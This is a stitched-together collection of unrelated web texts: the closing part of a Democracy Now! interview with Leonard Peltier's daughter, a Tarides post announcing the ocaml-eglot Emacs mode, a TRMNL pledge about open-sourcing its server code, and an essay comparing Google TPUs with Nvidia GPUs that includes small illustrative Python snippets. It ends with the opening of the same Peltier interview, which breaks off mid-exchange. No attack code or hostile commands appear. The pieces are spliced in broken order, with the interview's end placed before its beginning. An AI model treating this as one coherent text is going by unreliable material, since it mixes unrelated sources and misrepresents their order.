But as I got older and started to understand what was going on, why he was there, I started to resent it, you know, because every time 3:00 came around, I hated it, because I knew I was going to have to leave my dad, and I wouldn’t see him again, especially that last day of the visit. We would usually spend about a week. And that last day of visits, I would just, like, “Man, I’m not going to see my dad again for six, seven months,” you know? And then, as I got older, it was just like, “Oh my god, what if I don’t get to see him again next time?”
You know, so, eventually I packed up my kids and moved to Kansas so I could be closer to him. And then that worked out for about three years. And then, from there, they moved him again across the country. So, yeah, we didn’t get to have the relationship I thought we would during that time, just because he was way over in Pennsylvania, then Florida, and I was stuck in Kansas.
AMY GOODMAN:
And what was your understanding from early on, and did it change, of why he was behind bars?
MARQUETTA SHIELDS-PELTIER:
Yeah, I just — like, I knew things had happened that were, you know, not — I’ve always been told and taught that my dad was there because he wanted better for me as his daughter, as a Native person. He wanted people to respect me, not only as his daughter, but just as a Native person, you know, to understand that we are not property or we are not animals or savages, that we are human beings, just like everybody else.
And as I got older and started understanding his case and what was, you know, the details of it, then it went from, you know, resenting — I never resented my dad, but I resented the government, and I resented — you know, but it went from not knowing the extent of it to knowing the full extent of it and just being proud of — like, even though I prayed for him to get out all the time, I knew what he stood for, and I was proud. And I had to, you know, keep fighting for him, because I knew that someday, someday, he would get out, you know? And he did. He did, which is unbelievable to me still.
AMY GOODMAN:
When did you hear that Biden had commuted his sentence and sentenced him to home confinement?
MARQUETTA SHIELDS-PELTIER:
I don’t remember the date exactly, but it was sometime at the end of January. It was just crazy, because I was planning on leaving. I was going to leave the country and just disappear, because I — after his parole was denied in June of ’24 — I think it was ’24 — I basically thought my dad was going to die there. So I had given up on everything, and I was getting ready to disappear into Canada and just disappear.
But I was sleeping on my mom’s couch that morning, and I heard the phone ring. And then I heard my mom, and she said, “What?” And I thought the worst, of course, that they called to tell me my dad was dead. And then my cousin was crying, and she said, “Marquetta, I’m so happy.” So I was like, “What are you talking about?” She’s like, “Your dad’s getting out of prison.” I was like, you know, like — I cussed in my mom’s house. And I usually — unless I’m joking with her. I just was like, “You’re lying. You’re lying to me. You’re lying to me. My dad’s” — She’s like, “They’re — Joe Biden” — and, you know, this, that and the other. And I just — I couldn’t — I didn’t know what to do. I just — I froze. And I still can’t remember if I called my nephew or if I called my brother, who I called, but I called somebody, and I asked them. I was like, “Is it true? My dad’s getting out of prison?” And they’re like, “Yeah.”
I’m so thankful to millions of people for the last 49 years of my life that helped pray for him, that helped write letters, that helped make phone calls, that sent signed petitions. You know, that’s all those people in it and to help bring my dad home.
But the thing of it is, is people don’t understand that, you know, when my dad went to prison, so did we. You know, we were out here free, but we weren’t free. We were out here struggling when he was in there struggling. And I was blessed enough to have people like my grandmother and my mom to show me that, you know what, it’s going to be OK. It’s going to be OK.
AMY GOODMAN:
Leonard Peltier means so much to so many people around the world. Talk about what he means, not just to you as his daughter, but to you as an Indigenous woman.
MARQUETTA SHIELDS-PELTIER:
Oh, man, my dad, I told him this before. He’s my hero. He’s the definition of what a warrior should be, you know, to be able to stand strong and still come out of that prison smiling, to be able to set an example. And, like, I look up to my dad, because I don’t know very many people that could go through the stuff he’s been through and still have a smile on his face. And it makes me proud to call him my dad. You know, that’s my dad.
AMY GOODMAN:
Marquetta Shields-Peltier, the daughter of Leonard Peltier, speaking in September at Turtle Mountain Reservation in North Dakota, where Leonard has been living since being released from prison in February.
And that does it for today’s show. To see all of Democracy Now!'s coverage of Leonard Peltier and our interview with him over the years behind bars, you can go to democracynow.org. Special thanks to Denis Moynihan, Charina Nadura, Sam Alcoff and Zazu, the newshound.
Democracy Now! is produced with Mike Burke, Renée Feltz, Deena Guzder, Messiah Rhodes, Nermeen Shaikh, María Taracena, Nicole Salazar, Sara Nasser, Charina Nadura, Sam Alcoff, Tey-Marie Astudillo, John Hamilton, Robby Karran, Hany Massoud and Safwat Nazzal. Our executive director is Julie Crosby. Special thanks to Becca Staley, Jon Randolph, Paul Powell, Mike Di Filippo, Miguel Nogueira, Hugh Gran, Carl Marxer, David Prude, Dennis McCormick, Matt Ealy, Anna Özbek, Emily Andersen, Dante Torrieri and Buffy Saint Marie Hernandez. I'm Amy Goodman. Thanks so much for joining us.
The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License. Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
Bringing Emacs Support to OCaml's LSP Server with ocaml-eglot
The team of people working on editors and editor support at Tarides is excited to announce the release of ocaml-eglot! The project is part of Tarides’ efforts to improve the OCaml developer experience across different platforms and workflows, a high-priority goal continuously evolving with community feedback.
Bringing Emacs integration to OCaml’s LSP server benefits both the user and the maintainer. If you use Emacs and want to start using OCaml, or switch to a more simplified setup, check out the ocaml-eglot repository on GitHub to try the new Emacs minor mode.
This post will give you some background to the development of the new tool, as well as the benefits and limitations of LSP, and the features of ocaml-eglot. Let’s dive in!
The Problem: ‘Editor Burnout’
The goal of the ocaml-eglot project was to address a problem the engineers had dubbed ‘editor burnout’. Developers rely on editors to simplify their coding workflow, and over the years, the creation of more and more editor features has transformed editors into sophisticated, feature-rich development environments. However, all these features need to be added and maintained in every editor. Maintaining support for so many different features across different editors, including updating the support every time something changes on the language server's end, can quickly become untenable. ‘Editor burnout’ refers to the pressure this puts on maintainers.
In OCaml, the editor-agnostic server Merlin is used to provide IDE-like services. By providing contextual information about the code, Merlin lets developers use simple text editors to write OCaml and benefit from features that typically come from a fully integrated IDE. However, Merlin also had a high maintenance cost due to each code editor needing its own integration layer.
So, now that we understand the problem, what is the solution?
LSP and OCaml
LSP, or the Language Server Protocol, is a widely documented open protocol that standardises the interactions between an editor and a server providing IDE services. LSP defines a collection of standard features across programming languages, which has contributed to its widespread adoption. This adoption has made LSP a standard protocol across editors, including Visual Studio Code, Vim, Emacs, and many more.
The language server implementation for LSP in OCaml is ocaml-lsp. It uses Merlin as a library. It was originally designed to integrate with Visual Studio Code when paired with the vscode-ocaml-platform plugin. We can significantly reduce the maintenance burden by relying on LSP's defaults for editor compatibility and only providing support for OCaml-specific features. This benefits not only the maintainers, but also the user by ensuring the plugins remain performant, compatible, maintainable, and up-to-date.
LSP aims to be compatible with as many languages as possible, making some assumptions about how those languages are structured and function. Inevitably, these assumptions cannot cover all the features of every language. This is true of OCaml, where the editing experience relies on custom features outside the scope of the LSP.
The solution to this incompatibility is to create a client-side extension that covers what the editor’s standard LSP support does not. That way, we have both the basic LSP compatibility and an extension that adds support for OCaml-specific features. As we’ve hinted above, this has the added benefit of keeping the maintenance workload on the editor side down by delegating the standard LSP handling to the generic LSP plug-ins.
As an editor popular with the OCaml community, let’s take a brief look at how Emacs and OCaml work together. In Emacs, developers can attach a "buffer"/file to a major mode to handle a feature of a language like OCaml: features like syntax highlighting, for example. One file is always attached to just one major mode.
OCaml has four major modes:
caml-mode: the original,
tuareg: a full reimplementation of caml-mode and the most common choice by users,
ocaml-ts-mode: an experimental version of caml-mode based on tree-sitter grammar,
neocaml: an experimental full reimplementation of tuareg based on tree-sitter grammar.
Now, we can also attach one or multiple minor-modes to a file, and this is where ocaml-eglot comes into play. For example, we can use a major mode (we generally recommend Tuareg) and link ocaml-eglot to it as a minor mode, thereby attaching LSP features to all files in which Tuareg is active.
Eglot is the default LSP client bundled with Emacs, and ocaml-eglot provides full OCaml language support in Emacs as an alternative to Merlin integration. (By the way, thanks to the ocaml-eglot client using LSP’s defaults, its code size is a lot smaller than the traditional OCaml Emacs mode, which also makes it easier to maintain!).
The ideal user of ocaml-eglot is someone who is already an active Emacs user and wants to start using OCaml with minimal start-up hassle. The simplified configuration, automated setup, and consistency across different editors and languages are helpful both to people new to OCaml and to seasoned users with multiple editors, since they improve the workflow. The plugin supports all the features of the integration of Merlin into Emacs, merlin.el, meaning that users don’t lose any functionality with the new system. The ocaml-eglot project is also actively maintained, and users can expect regular future updates and a tool that evolves with the times.
Creating OCaml-Eglot
Let's peek behind the curtain at the development of ocaml-eglot. There are two common approaches that developers who implement language servers tend to use to add features outside of the LSP. These are Code Actions and Custom Requests:
Code Action: A contextual action that can be triggered from a document perspective, can perform a file modification, and potentially broadcast a command that can be interpreted by the client. Code Actions are more ‘integrated’, which means that they sometimes even work ‘out of the box’ with the client. However, they are limited in terms of interactions and the command lifecycle.
Custom Request: Not formally part of the protocol, but since LSP is a protocol layered on top of a regular server that can handle JSON RPC messages and responses, developers can still use arbitrary requests to provide extra features. Custom Requests give developers more power to add interactions and experiences, but always need specific editor integration.
The design process behind OCaml-eglot essentially boiled down to identifying all the features offered by merlin.el that were not covered by the LSP, and then adding them using Code Actions or Custom Requests. During this process, the developers asked themselves two questions to help them decide which approach to use:
Should the feature be configured by arguments that are independent of the context? If the answer is yes, they used a Custom Request; if no, they used a Code Action.
Does the feature require additional interaction, such as choosing one option from a set of possible results? If yes, they used a Custom Request; if no, they used a Code Action.
Of course, things were a little more complicated than this in reality, but it still gives you a good idea of the types of technical decisions the team made during development.
Try it Out!
Install ocaml-eglot by checking out its GitHub repository and following the instructions. When you have had a chance to test it out in your projects, please share your experience on OCaml Discuss to give other users an idea of what to expect and the maintainers an idea of what to improve!
Installing ocaml-eglot is just like installing a regular Emacs package. It is available on Melpa and can be installed in many different ways, for example with GNU's use-package. More detailed instructions are available in the repo’s readme, including instructions on recommended configurations for ocaml-eglot.
Features
Some of the features that ocaml-eglot comes with are:
Error navigation: Quickly jump to the next or previous error(s).
Type information: Display types under cursor with adjustable verbosity and navigate enclosing expressions.
Code generation: Pattern match construction, case completion, and wildcard refinement via the ‘destruct’ feature.
Navigation: Jump between language constructs like let, module, function, match, and navigate phrases and pattern cases.
Search: Find definitions, declarations, and references. The team also recently introduced a new Xref Backend inspired by one used by Jane Street for years.
Check out the project's readme to discover the full list of commands offered by ocaml-eglot. The new mode is ‘agile’, meaning that the team can also incubate new features quickly, like the refactor extract at toplevel.
You can connect with us on Bluesky, Mastodon, Threads, and LinkedIn or sign up to our mailing list to stay updated on our latest projects. We look forward to hearing from you!
We made a promise to never brick your device. Here's a progress report:
1. July 2024 - open sourced our firmware
2. December 2024 - built or commissioned server clients in Ruby, Elixir, and Python
3. January 2025 - began selling BYOD licenses - DIY build docs coming soon
4. February 2025 - launched Framework, a beautiful and free e-ink UI kit
5. February 2025 - onboarded a senior engineer to focus on OSS (hi Brooke!)
But there's still 1 concern.
As more TRMNL devices opt into our lifetime-access hosted platform, how will we handle growing server costs?
Introducing the Unbrickable Pledge.
As of February 18, 2025, the entire TRMNL team, operating under TRMNL Holdings LLC, hereby affirms our intent to release the core web application source code if and when we ever become insolvent as a company.
Sharing source code is the right thing to do for our customers. Preventing e-waste is the right thing to do for our planet. And sharing How is the right thing to do for TRMNL.
We hope this alleviates concerns by those who are much better at math than us and wondered: how is this business model possible?
It's possible because of you.
To staying focused,
Ryan and the TRMNL team
TPUs vs. GPUs and why Google is positioned to win the AI race in the long term
As I find the topic of Google TPUs extremely important, I am publishing a comprehensive deep dive, not just a technical overview, but also strategic and financial coverage of the Google TPU.
Topics covered:
The history of the TPU and why it all even started?
The difference between a TPU and a GPU?
Performance numbers TPU vs GPU?
Where are the problems for the wider adoption of TPUs
Google’s TPU is the biggest competitive advantage of its cloud business for the next 10 years
How many TPUs does Google produce today, and how big can that get?
Gemini 3 and the aftermath of Gemini 3 on the whole chip industry
Let’s dive into it.
The history of the TPU and why it all even started?
The story of the Google Tensor Processing Unit (TPU) begins not with a breakthrough in chip manufacturing, but with a realization about math and logistics. Around 2013, Google’s leadership—specifically Jeff Dean, Jonathan Ross (the CEO of Groq), and the Google Brain team—ran a projection that alarmed them. They calculated that if every Android user utilized Google’s new voice search feature for just three minutes a day, the company would need to double its global data center capacity just to handle the compute load.
At the time, Google was relying on standard CPUs and GPUs for these tasks. While powerful, these general-purpose chips were inefficient for the specific heavy lifting required by Deep Learning: massive matrix multiplications. Scaling up with existing hardware would have been a financial and logistical nightmare.
This sparked a new project. Google decided to do something rare for a software company: build its own custom silicon. The goal was to create an
ASIC (Application-Specific Integrated Circuit)
designed for one job only: running TensorFlow neural networks.
Key Historical Milestones:
2013-2014:
The project moved really fast as Google both hired a very capable team and, to be honest, had some luck in their first steps. The team went from design concept to deploying silicon in data centers in just 15 months—a very short cycle for hardware engineering.
2015:
Before the world knew they existed, TPUs were already powering Google’s most popular products. They were silently accelerating Google Maps navigation, Google Photos, and Google Translate.
2016
:
Google officially unveiled the TPU at Google I/O 2016.
This urgency to solve the “data center doubling” problem is why the TPU exists. It wasn’t built to sell to gamers or render video; it was built to save Google from its own AI success. With that in mind, Google has been thinking about the »costly« AI inference problems for over a decade now. This is also one of the main reasons why the TPU is so good today compared to other ASIC projects.
The difference between a TPU and a GPU?
To understand the difference, it helps to look at what each chip was originally built to do. A GPU is a “general-purpose” parallel processor, while a TPU is a “domain-specific” architecture.
The GPUs were designed for graphics. They excel at parallel processing (doing many things at once), which is great for AI. However, because they are designed to handle everything from video game textures to scientific simulations, they carry “architectural baggage.” They spend significant energy and chip area on complex tasks like caching, branch prediction, and managing independent threads.
A TPU, on the other hand, strips away all that baggage. It has no hardware for rasterization or texture mapping. Instead, it uses a unique architecture called a Systolic Array.
The “Systolic Array” is the key differentiator. In a standard CPU or GPU, the chip moves data back and forth between the memory and the computing units for every calculation. This constant shuffling creates a bottleneck (the Von Neumann bottleneck).
In a TPU’s systolic array, data flows through the chip like blood through a heart (hence “systolic”).
It loads data (weights) once.
It passes inputs through a massive grid of multipliers.
The data is passed directly to the next unit in the array without writing back to memory.
What this means, in essence, is that a TPU, because of its systolic array, drastically reduces the number of memory reads and writes required from HBM. As a result, the TPU can spend its cycles computing rather than waiting for data.
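To make the data-flow idea concrete, here is a toy NumPy sketch of a weight-stationary matrix multiply. This is my own illustration of the concept, not Google's code and not how a TPU is actually programmed; the function name and shapes are arbitrary:

import numpy as np

def systolic_style_matmul(activations: np.ndarray, weights: np.ndarray) -> np.ndarray:
    """Toy emulation of a weight-stationary systolic array.

    The weights are 'loaded' into the grid once; each activation row is then
    streamed through, and partial sums flow from cell to cell instead of being
    written back to memory after every multiply.
    """
    rows, cols = weights.shape                  # grid of rows x cols multiply-accumulate cells
    out = np.zeros((activations.shape[0], cols))
    for i, a in enumerate(activations):         # stream activations row by row
        partial = np.zeros(cols)                # partial sums travel through the array
        for k in range(rows):                   # each cell multiplies and forwards
            partial += a[k] * weights[k]        # no intermediate writes back to "HBM"
        out[i] = partial                        # only the final result leaves the array
    return out

acts = np.random.rand(4, 8)   # activations
w = np.random.rand(8, 3)      # weights, loaded once
assert np.allclose(systolic_style_matmul(acts, w), acts @ w)

The real hardware does this with thousands of multiply-accumulate units operating in lockstep; the point of the sketch is simply that the weights stay put and the partial sums never round-trip through memory.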
Google’s new TPU design, also called Ironwood, addressed some of the key areas where the TPU was previously lacking:
They enhanced the SparseCore for efficiently handling large embeddings (good for recommendation systems and LLMs)
It increased HBM capacity and bandwidth (up to 192 GB per chip). For a better understanding, Nvidia’s Blackwell B200 has 192GB per chip, while Blackwell Ultra, also known as the B300, has 288 GB per chip.
Improved the Inter-Chip Interconnect (ICI) for linking thousands of chips into massive clusters, also called TPU Pods (needed for AI training as well as some test-time compute inference workloads). When it comes to ICI, it is important to note that it is very performant, with a peak bandwidth of 1.2 TB/s vs Blackwell NVLink 5 at 1.8 TB/s. But Google’s ICI, together with its specialized compiler and software stack, still delivers superior performance on some specific AI tasks.
The key thing to understand is that because the TPU doesn’t need to decode complex instructions or constantly access memory, it can deliver significantly higher Operations Per Joule.
For scale-out, Google uses Optical Circuit Switch (OCS) and its 3D torus network, which compete with Nvidia’s InfiniBand and Spectrum-X Ethernet. The main difference is that OCS is extremely cost-effective and power-efficient as it eliminates electrical switches and O-E-O conversions, but because of this, it is not as flexible as the other two. So again, the Google stack is extremely specialized for the task at hand and doesn’t offer the flexibility that GPUs do.
Performance numbers TPU vs GPU?
As we defined the differences, let’s look at real numbers showing how the TPU performs compared to the GPU. Since Google isn’t revealing these numbers, it is really hard to get details on performance. I studied many articles and alternative data sources, including interviews with industry insiders, and here are some of the key takeaways.
The first important thing is that there is very limited information on Google’s newest TPUv7 (Ironwood): Google introduced it in April 2025, and it is only now starting to become available to external clients (internally, Google is said to have been using Ironwood since April, possibly even for Gemini 3.0). Why does this matter? Compare, for example, TPUv7 with the older but still widely used TPUv5p, based on SemiAnalysis data:
TPUv7 produces 4,614 TFLOPS (BF16) vs 459 TFLOPS for TPUv5p
TPUv7 has 192 GB of memory capacity vs 96 GB for TPUv5p
TPUv7 memory bandwidth is 7,370 GB/s vs 2,765 GB/s for v5p
We can see that the performance leaps between v5 and v7 are very significant. To put that in context, most of the comments that we will look at are more focused on TPUv6 or TPUv5 than v7.
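As a back-of-the-envelope check on those figures, the ratio of peak compute to memory bandwidth roughly indicates how much arithmetic each chip can do per byte fetched from HBM before it becomes bandwidth-bound. The snippet below just plugs the numbers quoted above into Python; these are peak vendor specs, not measured performance:

# Figures quoted above: BF16 TFLOPS, HBM capacity (GB), HBM bandwidth (GB/s)
chips = {
    "TPUv5p": {"tflops": 459,  "hbm_gb": 96,  "bw_gbps": 2765},
    "TPUv7":  {"tflops": 4614, "hbm_gb": 192, "bw_gbps": 7370},
}

for name, c in chips.items():
    flops_per_byte = (c["tflops"] * 1e12) / (c["bw_gbps"] * 1e9)
    print(f"{name}: ~{flops_per_byte:.0f} peak FLOPs per byte of HBM bandwidth")
    # TPUv5p: ~166, TPUv7: ~626

v5, v7 = chips["TPUv5p"], chips["TPUv7"]
print(f"v7 over v5p: compute x{v7['tflops']/v5['tflops']:.1f}, "
      f"capacity x{v7['hbm_gb']/v5['hbm_gb']:.1f}, "
      f"bandwidth x{v7['bw_gbps']/v5['bw_gbps']:.1f}")
# v7 over v5p: compute x10.1, capacity x2.0, bandwidth x2.7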
Based on analyzing a ton of interviews with Former Google employees, customers, and competitors (people from AMD, NVDA & others), the summary of the results is as follows.
Most agree that TPUs are more cost-effective compared to Nvidia GPUs, and most agree that the performance per watt for TPUs is better, though this view does not apply across all use cases.
A Former Google Cloud employee:
»If it is the right application, then they can deliver much better performance per dollar compared to GPUs. They also require much lesser energy and produces less heat compared to GPUs. They’re also more energy efficient and have a smaller environmental footprint, which is what makes them a desired outcome.
The use cases are slightly limited to a GPU, they’re not as generic, but for a specific application, they can offer as much as 1.4X better performance per dollar, which is pretty significant saving for a customer that might be trying to use GPU versus TPUs.«
Similarly, a very insightful comment from a Former Unit Head at Google around TPUs materially lowering AI-search cost per query vs GPUs:
»TPU v6 is 60-65% more efficient than GPUs, prior generations 40-45%«
This interview was in November 2024, so the expert is probably comparing the v6 TPU with the Nvidia Hopper. Today, we already have Blackwell vs V7.
Many experts also mention the speed benefit that TPUs offer, with a Former Google Head saying that TPUs are 5x faster than GPUs for training dynamic models (like search-like workloads).
There was also a very eye-opening interview with a client who used both Nvidia GPUs and Google TPUs as he describes the economics in great detail:
»If I were to use eight H100s versus using one v5e pod, I would spend a lot less money on one v5e pod. In terms of price point money, performance per dollar, you will get more bang for TPU. If I already have a code, because of Google’s help or because of our own work, if I know it already is going to work on a TPU, then at that point it is beneficial for me to just stick with the TPU usage.
In the long run, if I am thinking I need to write a new code base, I need to do a lot more work, then it depends on how long I’m going to train. I would say there is still some, for example, of the workload we have already done on TPUs that in the future because as Google will add newer generation of TPU, they make older ones much cheaper.
For example, when they came out with v4, I remember the price of v2 came down so low that it was practically free to use compared to any NVIDIA GPUs.
Google has got a good promise so they keep supporting older TPUs and they’re making it a lot cheaper. If you don’t really need your model trained right away, if you’re willing to say, “I can wait one week,” even though the training is only three days, then you can reduce your cost 1/5.«
Another valuable interview was with a current AMD employee, acknowledging the benefits of ASICs:
»I would expect that an AI accelerator could do about probably typically what we see in the industry. I’m using my experience at FPGAs. I could see a 30% reduction in size and maybe a 50% reduction in power vs a GPU.«
We also got some numbers from a Former Google employee who worked in the chip segment:
»When I look at the published numbers, they (TPUs) are anywhere from 25%-30% better to close to 2x better, depending on the use cases compared to Nvidia. Essentially, there’s a difference between a very custom design built to do one task perfectly versus a more general purpose design.«
What is also known is that the real edge of TPUs lies not in the hardware but in the software and in the way Google has optimized its ecosystem for the TPU.
A lot of people mention the problem that every Nvidia »competitor« like the TPU faces, which is the fast development of Nvidia and the constant »catching up« to Nvidia problem. This month, a former Google Cloud employee addressed that concern head-on, as he believes TPUs are improving at a faster rate than Nvidia’s GPUs:
»The amount of performance per dollar that a TPU can generate from a new generation versus the old generation is a much significant jump than Nvidia«
In addition, the recent data from Google’s presentation at the Hot Chips 2025 event backs that up, as Google stated that the TPUv7 is 100% better in performance per watt than their TPUv6e (Trillium).
Even for hard Nvidia advocates, TPUs are not to be shrugged off easily, as even Jensen thinks very highly of Google’s TPUs. In a podcast with Brad Gerstner, he mentioned that when it comes to ASICs, Google with TPUs is a »special case«. A few months ago, we also got an article from the WSJ saying that after the news publication The Information published a report that stated that OpenAI had begun renting Google TPUs for ChatGPT, Jensen called Altman, asking him if it was true, and signaled that he was open to getting the talks back on track (investment talks). Also worth noting was that Nvidia’s official X account posted a screenshot of an article in which OpenAI denied plans to use Google’s in-house chips. To say the least, Nvidia is watching TPUs very closely.
Ok, but after looking at some of these numbers, one might think, why aren’t more clients using TPUs?
Where are the problems for the wider adoption of TPUs
The main problem for TPU adoption is the ecosystem. Nvidia’s CUDA is ingrained in the minds of most AI engineers, as they have been learning CUDA in universities.
Google has developed its ecosystem internally but not externally, as it has used TPUs only for its internal workloads until now. TPUs use a combination of JAX and TensorFlow, while the industry skews to CUDA and PyTorch (although TPUs also support PyTorch now). While Google is working hard to make its ecosystem more supportive and convertible with other stacks, it is also a matter of libraries and ecosystem formation that takes years to develop.
It is also important to note that, until recently, the GenAI industry’s focus has largely been on training workloads. In training workloads, CUDA is very important, but when it comes to inference, even reasoning inference, CUDA is not that important, so the chances of expanding the TPU footprint in inference are much higher than in training (although TPUs do really well in training as well – Gemini 3 being the prime example).
The fact that most clients are multi-cloud also poses a challenge for TPU adoption, as AI workloads are closely tied to data and its location (cloud data transfer is costly). Nvidia is accessible via all three hyperscalers, while TPUs are available only at GCP so far. A client who uses TPUs and Nvidia GPUs explains it well:
»Right now, the one biggest advantage of NVIDIA, and this has been true for past three companies I worked on is because AWS, Google Cloud and Microsoft Azure, these are the three major cloud companies.
Every company, every corporate, every customer we have will have data in one of these three. All these three clouds have NVIDIA GPUs. Sometimes the data is so big and in a different cloud that it is a lot cheaper to run our workload in whatever cloud the customer has data in.
I don’t know if you know about the egress cost that is moving data out of one cloud is one of the bigger cost. In that case, if you have NVIDIA workload, if you have a CUDA workload, we can just go to Microsoft Azure, get a VM that has NVIDIA GPU, same GPU in fact, no code change is required and just run it there.
With TPUs, once you are all relied on TPU and Google says, “You know what? Now you have to pay 10X more,” then we would be screwed, because then we’ll have to go back and rewrite everything. That’s why. That’s the only reason people are afraid of committing too much on TPUs. The same reason is for Amazon’s Trainium and Inferentia.«
These problems are well known at Google, so it is no surprise that, internally, the debate over keeping TPUs inside Google or starting to sell them externally is a constant topic. Keeping them internal enhances the GCP moat, but at the same time, many former Google employees believe that at some point, Google will start offering TPUs externally as well, maybe through some neoclouds, not necessarily with the biggest two competitors, Microsoft and Amazon. Opening up the ecosystem, providing support, etc., and making it more widely usable are the first steps toward making that possible.
A former Google employee also mentioned that Google last year formed a more sales-oriented team to push and sell TPUs, so it’s not like they have been pushing hard to sell TPUs for years; it is a fairly new dynamic in the organization.
Google’s TPU is the biggest competitive advantage of its cloud business for the next 10 years
The most valuable thing for me about TPUs is their impact on GCP. As we witness the transformation of cloud businesses from the pre-AI era to the AI era, the biggest takeaway is that the industry has gone from an oligopoly of AWS, Azure, and GCP to a more commoditized landscape, with Oracle, Coreweave, and many other neoclouds competing for AI workloads. The problem with AI workloads is the competition and Nvidia’s 75% gross margin, which also results in low margins for AI workloads. The cloud industry is moving from a 50-70% gross margin industry to a 20-35% gross margin industry. For cloud investors, this should be concerning, as the future profile of some of these companies is more like that of a utility than an attractive, high-margin business. But there is a solution to avoiding that future and returning to a normal margin: the ASIC.
The cloud providers who can control the hardware and are not beholden to Nvidia and its 75% gross margin will be able to return to the world of 50% gross margins. And it is no surprise that all three, AWS, Azure, and GCP, are developing their own ASICs. The most mature by far is Google’s TPU, followed by Amazon’s Trainium, and lastly Microsoft’s MAIA (although Microsoft owns the full IP of OpenAI’s custom ASICs, which could help them in the future).
While even with ASICs you are not 100% independent, as you still have to work with someone like Broadcom or Marvell, whose margins are lower than Nvidia’s but still not negligible, Google is again in a very good position. Over the years of developing TPUs, Google has managed to control much of the chip design process in-house. According to a current AMD employee, Broadcom no longer knows everything about the chip. At this point, Google is the front-end designer (the actual RTL of the design) while Broadcom is only the backend physical design partner. Google, on top of that, also, of course, owns the entire software optimization stack for the chip, which makes it as performant as it is. According to the AMD employee, based on this work split, he thinks Broadcom is lucky if it gets a 50-point gross margin on its part.
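To see why this margin stack matters so much, here is a toy comparison. The 75% Nvidia gross margin and the roughly 50-point partner margin come from the discussion above; the one-third partner share of the bill of materials and the normalization to $1 of manufacturing cost are my own assumptions, for illustration only:

def buyer_price(cogs: float, vendor_gross_margin: float) -> float:
    """Price a buyer pays for silicon sold at a given vendor gross margin."""
    return cogs / (1.0 - vendor_gross_margin)

cogs = 1.00  # normalize the accelerator's manufacturing cost to $1

# Buying a merchant GPU at ~75% gross margin: the buyer pays ~4x COGS.
merchant_gpu = buyer_price(cogs, 0.75)

# In-house ASIC where a backend partner earns ~50% margin, but only on an
# assumed one-third of the bill of materials; the rest is paid at cost.
partner_share = 1 / 3
in_house_asic = buyer_price(cogs * partner_share, 0.50) + cogs * (1 - partner_share)

print(f"merchant GPU:  ~${merchant_gpu:.2f} per $1 of manufacturing cost")   # ~$4.00
print(f"in-house ASIC: ~${in_house_asic:.2f} per $1 of manufacturing cost")  # ~$1.33

Under these illustrative assumptions, the in-house route pays roughly a third as much for the same silicon, which is the arithmetic behind the margin argument in this section.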
Without having to pay Nvidia for the accelerator, a cloud provider can either price its compute similarly to others and maintain a better margin profile or lower costs and gain market share. Of course, all of this depends on having a very capable ASIC that can compete with Nvidia. Unfortunately, it looks like Google is the only one that has achieved that, as the number one-performing model is Gemini 3 trained on TPUs. According to some former Google employees, internally, Google is also using TPUs for inference across its entire AI stack, including Gemini and models like Veo. Google buys Nvidia GPUs for GCP, as clients want them because they are familiar with them and the ecosystem, but internally, Google is full-on with TPUs.
As the complexity of each generation of ASICs increases, similar to the complexity and pace of Nvidia, I predict that not all ASIC programs will make it. I believe outside of TPUs, the only real hyperscaler shot right now is AWS Trainium, but even that faces much bigger uncertainties than the TPU. With that in mind, Google and its cloud business can come out of this AI era as a major beneficiary and market-share gainer.
Recently, we even got comments from the SemiAnalysis team praising the TPU:
»Google’s silicon supremacy among hyperscalers is unmatched, with their TPU 7th Gen arguably on par with Nvidia Blackwell. TPU powers the Gemini family of models which are improving in capability and sit close to the pareto frontier of $ per intelligence in some tasks«
How many TPUs does Google produce today, and how big can that get?
Here are the numbers that I researched:
"I'm Not Going to Give Up": Leonard Peltier on Indigenous Rights, His Half-Century in Prison & Coming Home
Democracy Now!
www.democracynow.org
2025-11-27 13:01:50
In September, Democracy Now! host Amy Goodman sat down with longtime political prisoner and Indigenous activist Leonard Peltier for his first extended television and radio broadcast interview since his release to home confinement in February. Before his commutation by former President Joe Biden, the...
This is a rush transcript. Copy may not be in its final form.
AMY GOODMAN:
In this special broadcast, we spend the hour with longtime Indigenous activist Leonard Peltier. In February, he was released from a federal prison in Florida after spending nearly half a century behind bars for a crime he says he did not commit. President Biden, on his last day in office, commuted Peltier’s life sentence to home confinement. Biden’s decision followed mounting calls by tribal leaders and supporters around the world in a decadeslong, community-led campaign fighting for his freedom.
In the 1970s, Peltier was involved with the American Indian Movement, known as AIM. In 1975, two FBI agents and one young AIM activist were killed in a shootout on the Pine Ridge Reservation in South Dakota. Two AIM members were later arrested for killing the agents. At the trial, the jury acquitted them. Leonard Peltier was arrested later, tried separately and convicted. Peltier has always maintained his innocence.
Notable supporters of Leonard Peltier over the years have included South African President Nelson Mandela, Pope Francis and Amnesty International. Supporters of Peltier say his trial was marked by gross
FBI
and federal prosecutorial misconduct, including the coercion of witnesses, fabricated testimony and suppressed exculpatory evidence.
After being released in February, Leonard Peltier returned home to live on the Turtle Mountain Band of Chippewa Reservation in Belcourt, North Dakota. On September 12th, Leonard Peltier celebrated his 81st birthday. People gathered throughout the day, visiting him and calling from around the world to celebrate. That night and the next day, we spoke to Leonard Peltier in his living room in his first extended TV/radio broadcast interview since his release from prison.
AMY GOODMAN:
Hi. I’m Amy Goodman, host of Democracy Now!, in the home of Leonard Peltier, just recently freed from prison after 49 years.
LEONARD PELTIER:
Plus two months.
AMY GOODMAN:
Plus two months.
LEONARD PELTIER:
Yeah.
AMY GOODMAN:
I’ve spoken to you so many times, Leonard, in prison, in various prisons, several of them supermax prisons. It is quite astonishing to be here with you in person. Tell us where we are. Where are we sitting?
LEONARD PELTIER:
We’re sitting in my home, that was given to me by my supporters. This was not given to me by the tribe, or the government had nothing to do with it. I was released by Biden under a commutation of my sentence and home confinement. Actually, what happened was, I was — I was taken out of one prison cell and really put into another type of prison. But this is my home now. This is my home. So it’s a million times better.
AMY GOODMAN:
Wait, what do you mean when you say you were taken out of your prison cell after more than 49 years, and you’re saying that you’re not completely free?
LEONARD PELTIER:
No, no, I’m on very restrictive restrictions. Even to go to the post office, I got to call my — I call her my handler. I have to call her to go to the post office. Then, when I get back, I have to call her and tell her I’m back. Or if I go anything, if I go shopping or whatever, I have to do that. If I have to go a hundred miles past the nation — I don’t call my place a “reservation,” either; we’re nations of people — I have to get a pass, usually from Washington, D.C., to go to medical, usually medical, or religious ceremonies on different nations, Indian Native nations.
AMY GOODMAN:
